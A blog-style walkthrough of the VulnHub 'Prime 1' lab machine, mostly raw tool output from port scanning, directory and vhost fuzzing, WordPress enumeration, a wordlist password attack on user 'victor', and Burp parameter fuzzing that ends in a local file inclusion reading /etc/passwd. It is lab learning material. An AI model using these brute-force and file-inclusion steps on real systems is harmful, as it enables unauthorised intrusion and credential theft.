THM: Prime et al
Updates
I’ve just done Love on HTB; no writeup obviously - it’s still an active box. I also did Prime 1 from VulnHub the other day and ermagerd this is lazy but….
## Ping the box, make sure it's up
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# ping 192.168.1.237
PING 192.168.1.237 (192.168.1.237) 56(84) bytes of data.
64 bytes from 192.168.1.237: icmp_seq=1 ttl=64 time=0.292 ms
^C
--- 192.168.1.237 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.292/0.292/0.292/0.000 ms
## Now run rustscan to see the open ports
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# rustscan -a 192.168.1.237 --ulimit 5000
ASCII ART NEVER WORKS
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 192.168.1.237:22
Open 192.168.1.237:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p ")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-25 06:13 EDT
Initiating ARP Ping Scan at 06:13
Scanning 192.168.1.237 [1 port]
Completed ARP Ping Scan at 06:13, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:13
Completed Parallel DNS resolution of 1 host. at 06:13, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 06:13
Scanning 192.168.1.237 [2 ports]
Discovered open port 80/tcp on 192.168.1.237
Discovered open port 22/tcp on 192.168.1.237
Completed SYN Stealth Scan at 06:13, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.1.237
Host is up, received arp-response (0.00020s latency).
Scanned at 2021-05-25 06:13:32 EDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:3B:70:71 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
## Follow up with nmap to see the detail
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# nmap -T4 -p22,80 -A 192.168.1.237 -oA nmap/tcp_detail -vv
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-25 06:16 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
Initiating ARP Ping Scan at 06:16
Scanning 192.168.1.237 [1 port]
Completed ARP Ping Scan at 06:16, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:16
Completed Parallel DNS resolution of 1 host. at 06:16, 0.00s elapsed
Initiating SYN Stealth Scan at 06:16
Scanning 192.168.1.237 [2 ports]
Discovered open port 80/tcp on 192.168.1.237
Discovered open port 22/tcp on 192.168.1.237
Completed SYN Stealth Scan at 06:16, 0.03s elapsed (2 total ports)
Initiating Service scan at 06:16
Scanning 2 services on 192.168.1.237
Completed Service scan at 06:16, 6.05s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.237
NSE: Script scanning 192.168.1.237.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.26s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
Nmap scan report for 192.168.1.237
Host is up, received arp-response (0.00032s latency).
Scanned at 2021-05-25 06:16:09 EDT for 9s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcSVb7n0rTb58TfCcHJgtutnZzqf0hl48jPxI+VHOyhiQIihkQVkshhc8LdnSUg2BRGZL+RFfNLan9Q6FY0D7T/7PMlggPtSLU80er3JJO+XMfO3NURgMtVtKS0m+nRbL9C/pKSgBewxIcPk7Y45aXjAo7tsSoJ3DZUDcaitfFbAlr+108VBSx/arOXbYtusI1E2OCj1v/VKgVA9N/FL/OHuloOZPs/hY0MoamQKy+XYNdyCtrvSeRmItf09YXhFJwfY9Tr/nk077J7cz3r3INP+AFrpKVjdUAtxNpb+zAJLMJY8WF7oRZ1B8Sdljsslkh8PPK8e6Z4/rlCaJYW0OX
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiCXK7fYpBhJbT1KsyJkcpdXc1+zrB9rHVxBPtvA9hwTF4R4dZCZI9IpMFrperU0wqI/8uGYF9mW8l3aOAhJqc=
| 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKMh3392Cf8RmKX5UyT6C1yLIVbncwwUg1i2P7/ucKk
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 08:00:27:3B:70:71 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/25%OT=22%CT=%CU=36659%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=60ACCE72%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=101%TI=Z%II=I%TS=8)
OS:OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4
OS:ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
OS:ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)
Uptime guess: 61.977 days (since Wed Mar 24 06:49:32 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 192.168.1.237
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.09 seconds
Raw packets sent: 25 (1.894KB) | Rcvd: 17 (1.366KB)
## Visit site and view page source; nothing interesting. Run dirsearch.
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# python3 /opt/dirsearch/dirsearch.py -u 192.168.1.237
/opt/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.4) or chardet (4.0.0) doesnt match a supported version!
warnings.warn("urllib3 ({}) or chardet ({}) doesnt match a supported "
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10848
Error Log: /opt/dirsearch/logs/errors-21-05-25_06-18-10.log
Target: http://192.168.1.237/ Output File: /opt/dirsearch/reports/192.168.1.237/_21-05-25_06-18-10.txt
[06:18:10] Starting:
[06:18:11] 403 - 299B - /.ht_wsr.txt
[06:18:11] 403 - 302B - /.htaccess.bak1
[06:18:11] 403 - 304B - /.htaccess.sample
[06:18:11] 403 - 302B - /.htaccess.save
[06:18:11] 403 - 302B - /.htaccess.orig
[06:18:11] 403 - 300B - /.htaccessOLD
[06:18:11] 403 - 301B - /.htaccessOLD2
[06:18:11] 403 - 302B - /.htaccess_orig
[06:18:11] 403 - 300B - /.htaccessBAK
[06:18:11] 403 - 300B - /.htaccess_sc
[06:18:11] 403 - 303B - /.htaccess_extra
[06:18:11] 403 - 292B - /.htm
[06:18:11] 403 - 293B - /.html
[06:18:11] 403 - 298B - /.htpasswds
[06:18:11] 403 - 299B - /.httr-oauth
[06:18:11] 403 - 302B - /.htpasswd_test
[06:18:12] 403 - 292B - /.php
[06:18:12] 403 - 293B - /.php3
[06:18:20] 200 - 131B - /dev [06:18:22] 200 - 147B - /image.php [06:18:22] 200 - 136B - /index.php [06:18:22] 200 - 136B - /index.php/login/
[06:18:22] 301 - 319B - /javascript -> http://192.168.1.237/javascript/
[06:18:26] 403 - 302B - /server-status/ [06:18:26] 403 - 301B - /server-status
[06:18:29] 200 - 3KB - /wordpress/wp-login.php [06:18:29] 200 - 11KB - /wordpress/
Task Completed
## Visit /dev
-------------------
hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking.
-------------------
## Visit /wordpress; run wpscan
Appears to be wordpress, with one post and an author *victor*
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# wpscan -e --url http://192.168.1.237/wordpress --api-token REDACTED --plugins-detection aggressive
_______________________________________________________________
[+] URL: http://192.168.1.237/wordpress/ [192.168.1.237]
[+] Started: Tue May 25 06:20:31 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.1.237/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.1.237/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.237/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.1.237/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.1.237/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
| - http://192.168.1.237/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
|
| [!] 31 vulnerabilities identified:
|
| [!] Title: WordPress 5.2.2 - Cross-Site Scripting (XSS) in Stored Comments
| Fixed in: 5.2.3
| References:
| - https://wpscan.com/vulnerability/1b880386-021d-43b1-9988-e196955c7a3e
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16218
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
|
Not interesting; removed
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.1.237/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://192.168.1.237/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.0
| Style URL: http://192.168.1.237/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.1.237/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <==========================================================================================================================================> (2591 / 2591) 100.00% Time: 00:00:03
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:00 <============================================================================================================================================> (349 / 349) 100.00% Time: 00:00:00
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <==========================================================================================================================================> (2575 / 2575) 100.00% Time: 00:00:03
[i] No Timthumbs Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=============================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <===================================================================================================================================================> (70 / 70) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:01 <========================================================================================================================================> (100 / 100) 100.00% Time: 00:00:01
[i] No Medias Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 22
[+] Finished: Tue May 25 06:20:47 2021
[+] Requests Done: 5884
[+] Cached Requests: 9
[+] Data Sent: 1.684 MB
[+] Data Received: 1.325 MB
[+] Memory used: 255.184 MB
[+] Elapsed time: 00:00:15
Not very interesting
Visit http://192.168.1.237/wordpress/wp-content/uploads
Nothing
## Fuzz
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.1.237
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 7l 26w 131c http://192.168.1.237/dev
403 11l 32w 301c http://192.168.1.237/server-status
301 9l 28w 319c http://192.168.1.237/javascript
301 9l 28w 326c http://192.168.1.237/javascript/jquery
200 10351l 43235w 284394c http://192.168.1.237/javascript/jquery/jquery
301 9l 28w 318c http://192.168.1.237/wordpress
301 9l 28w 329c http://192.168.1.237/javascript/prototype
301 9l 28w 327c http://192.168.1.237/wordpress/wp-admin
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_192_168_1_237-1621938928.state ...
[########>-----------] - 13m 3169419/7642710 18m found:8 errors:170
[###################>] - 13m 1224635/1273785 1518/s http://192.168.1.237
[##########>---------] - 11m 653362/1273785 939/s http://192.168.1.237/javascript
[#########>----------] - 11m 629594/1273785 915/s http://192.168.1.237/javascript/jquery
[#######>------------] - 9m 461867/1273785 794/s http://192.168.1.237/wordpress
[##>-----------------] - 4m 174995/1273785 618/s http://192.168.1.237/javascript/prototype
[>-------------------] - 50s 24960/1273785 495/s http://192.168.1.237/wordpress/wp-admin
## Cancelled
Add:
192.168.1.237 prime1
to /etc/hosts
## Vhosts scan
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://prime1" -H "Host: FUZZ.prime1" -t 42 --hw 12
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://prime1/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
000009532: 400 12 L 53 W 422 Ch "#www" 000010581: 400 12 L 53 W 422 Ch "#mail" 000047706: 400 12 L 53 W 422 Ch "#smtp" 000103135: 400 12 L 53 W 422 Ch "#pop3"
Total time: 83.20830
Processed Requests: 114441
Filtered Requests: 114437
Requests/sec.: 1375.355
Nothing
## Try password attack on wordpress
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# wpscan -U victor -P /usr/share/wordlists/rockyou.txt --url http://prime1/wordpress
_______________________________________________________________
[+] URL: http://prime1/wordpress/ [192.168.1.237]
[+] Started: Tue May 25 06:39:06 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://prime1/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://prime1/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://prime1/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://prime1/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Emoji Settings (Passive Detection)
| - http://prime1/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://prime1/wordpress/, Match: 'WordPress 5.2.2'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=============================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
^Cying victor / 080492 Time: 00:07:20 < > (20115 / 14344392) 0.14% ETA: 87:08:03
[i] No Valid Passwords Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output. > (20117 / 14344392) 0.14% ETA: 87:07:39
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue May 25 06:46:31 2021
[+] Requests Done: 20286
[+] Cached Requests: 4
[+] Data Sent: 6.74 MB
[+] Data Received: 89.833 MB
[+] Memory used: 239.996 MB
[+] Elapsed time: 00:07:25
Scan Aborted: Canceled by User
Cancel after no quick hits
## More fuzzing
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x txt,php,zip,log,bak --no-recursion
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.1.237
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [txt, php, zip, log, bak]
🚫 Do Not Recurse │ true
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403 11l 32w 301c http://192.168.1.237/server-status
200 7l 12w 136c http://192.168.1.237/index.php
301 9l 28w 319c http://192.168.1.237/javascript
200 15l 69w 412c http://192.168.1.237/secret.txt
200 6l 12w 147c http://192.168.1.237/image.php
403 11l 32w 297c http://192.168.1.237/.htpasswd
403 11l 32w 301c http://192.168.1.237/.htpasswd.txt
403 11l 32w 301c http://192.168.1.237/.htpasswd.php
403 11l 32w 301c http://192.168.1.237/.htpasswd.zip
403 11l 32w 301c http://192.168.1.237/.htpasswd.log
403 11l 32w 301c http://192.168.1.237/.htpasswd.bak
301 9l 28w 318c http://192.168.1.237/wordpress
200 7l 26w 131c http://192.168.1.237/dev
403 11l 32w 297c http://192.168.1.237/.htaccess
403 11l 32w 301c http://192.168.1.237/.htaccess.txt
403 11l 32w 301c http://192.168.1.237/.htaccess.php
403 11l 32w 301c http://192.168.1.237/.htaccess.zip
403 11l 32w 301c http://192.168.1.237/.htaccess.log
403 11l 32w 301c http://192.168.1.237/.htaccess.bak
403 11l 32w 292c http://192.168.1.237/.hta
403 11l 32w 296c http://192.168.1.237/.hta.txt
403 11l 32w 296c http://192.168.1.237/.hta.php
403 11l 32w 296c http://192.168.1.237/.hta.zip
403 11l 32w 296c http://192.168.1.237/.hta.log
403 11l 32w 296c http://192.168.1.237/.hta.bak
[####################] - 8s 140430/140430 0s found:25 errors:0
[####################] - 7s 28086/28086 3722/s http://192.168.1.237
Visit http://192.168.1.237/secret.txt
## Getting somewhere
----------------
Looks like you have got some secrets.
Ok I just want to do some help to you.
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//see the location.txt and you will get your next move//
----------------
## Doesn't exist?
http://192.168.1.237/location.txt does not exist
## Burpsuite parameter fuzzing
Try GET /image.php?%s=./secret.txt HTTP/1.1
with /usr/share/seclists/Discovery/Web-Content/common.txt
in Turbo Intruder, nothing
Also try /etc/passwd, POST methods. Then
GET /index.php?file=secret.txt HTTP/1.1
with *file* returns:
HTTP/1.1 200 OK
Date: Tue, 25 May 2021 10:54:28 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 169
Keep-Alive: timeout=5, max=65
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>you are digging wrong file</html>
## Fuzz harder for more PHP?
2203 feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php -C 403 -d 2
2204 feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -x php -C 403 -d 1
2205 feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php -C 403 -d 1
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt -C 403 -d 1
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.1.237
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💢 Status Code Filters │ [403]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [php, txt]
🔃 Recursion Depth │ 1
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 15l 69w 412c http://192.168.1.237/secret.txt
301 9l 28w 318c http://192.168.1.237/wordpress
301 9l 28w 319c http://192.168.1.237/javascript
200 6l 12w 147c http://192.168.1.237/image.php
200 7l 12w 136c http://192.168.1.237/index.php
200 7l 26w 131c http://192.168.1.237/dev
[####################] - 9m 7642710/7642710 0s found:6 errors:0
[####################] - 9m 3821355/3821355 6723/s http://192.168.1.237
## No; back to Burpsuite parameter fuzzing
GET /index.php?file=location.txt HTTP/1.1
HTTP/1.1 200 OK
Date: Tue, 25 May 2021 11:36:55 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 334
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>
GET /image.php?secrettier360=location.txt HTTP/1.1
Host: 192.168.1.237
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 25 May 2021 11:37:19 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 197
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>
GET /image.php?secrettier360=/etc/passwd HTTP/1.1
Host: 192.168.1.237
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 25 May 2021 11:37:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2616
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
